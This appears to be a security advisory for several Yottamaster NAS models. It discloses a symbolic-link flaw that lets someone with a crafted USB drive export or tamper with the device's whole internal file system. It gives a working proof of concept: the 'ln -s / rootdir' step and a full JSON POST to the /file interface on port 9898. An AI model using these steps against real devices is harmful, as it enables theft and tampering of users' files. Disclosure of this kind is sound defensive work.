Vendor: Yottamaster
Affected Products:
Vendor Homepage: https://yottamaster.com/
Vendor Contact Information: supports@yottamaster.com
A vulnerability exists in multiple Yottamaster NAS devices, including DM2 (version equal to or prior to V1.9.12), DM3 (version equal to or prior to V1.9.12), and DM200 (version equal to or prior to V1.2.23) that could be exploited by attackers to leak or tamper with the internal file system. This vulnerability stems from lax checks on symbolic links within external USB devices. Attackers can create a symlink to its root directory, insert the drive into the NAS device's slot, then access the USB drive's symlink directory mounted on the NAS to obtain all files within the NAS system and tamper with those files.
Format the USB drive to ext4 format, and then create a symbolic link within it, such as sudo ln -s / rootdir, to create a symbolic link to the root directory.
Then insert the USB flash drive into the external USB slot of the NAS device. An attacker can send the following POST message to the /file interface on port 9898 of the NAS, and export the entire internal file system of the NAS through the symbolic link in the USB.
{
"session": "HS_clo41CDBJEgM4VEafG0QK4GggLDrp6",
"method": "manage",
"params": {
"action": 0,
"des_path_type": 2,
"todir": "/",
"cmd": "copy",
"path": [
"/sdc1/rootdir/***"
],
"share_path_type": 7,
"to_groupid": 0
}
}
Finally, we can see that the entire file system directory inside the NAS has been exported.
